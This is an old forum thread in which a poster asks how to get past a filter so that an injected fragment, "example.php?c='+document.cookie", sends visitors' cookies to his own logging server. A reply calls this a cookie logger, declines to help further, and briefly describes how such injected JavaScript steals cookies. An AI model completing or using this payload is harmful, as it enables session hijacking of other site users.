Cookie Help

[A27]Matt

I mean, i have the remote file on the server, with all the php code needed to get teh cookie, but i'm not allowed to post "example.php?c='+document.cookie". If i was allowed to post that, it would take that cookie, and store it in a text file on my server. Problem is, im not. Any suggestions on how to get around this?

i have an image on my website that executed any php script when viewed.  so i posted it on my own forums to test it, and it does log my referer and webbrowser.  im trying to figure out what i should put in my code to have it log my cookie.  When i type 'javascript:alert(document.cookie)' in my webbrowser i get this [IMG]http://img133.imageshack.us/img133/4430/untitledyh5.jpg[/img]  That is my cookie.  What would i put in my script to log that as well?  Thanks

No, from it looks like hes setting up a cookie logger. Java script is client side only, so if your going to set up a cookie logger find a way to have others see it. I'm not going to explain more because this most likely violates the rules. If a mod sees this, you may want to lock this topic.

For those of you who don't know, a cookie logger is self explanatory. You inject malicious java script to send an HTTP request to your site to get the users cookie.

This thread is more than a year old. Please don't revive it unless you have something important to add.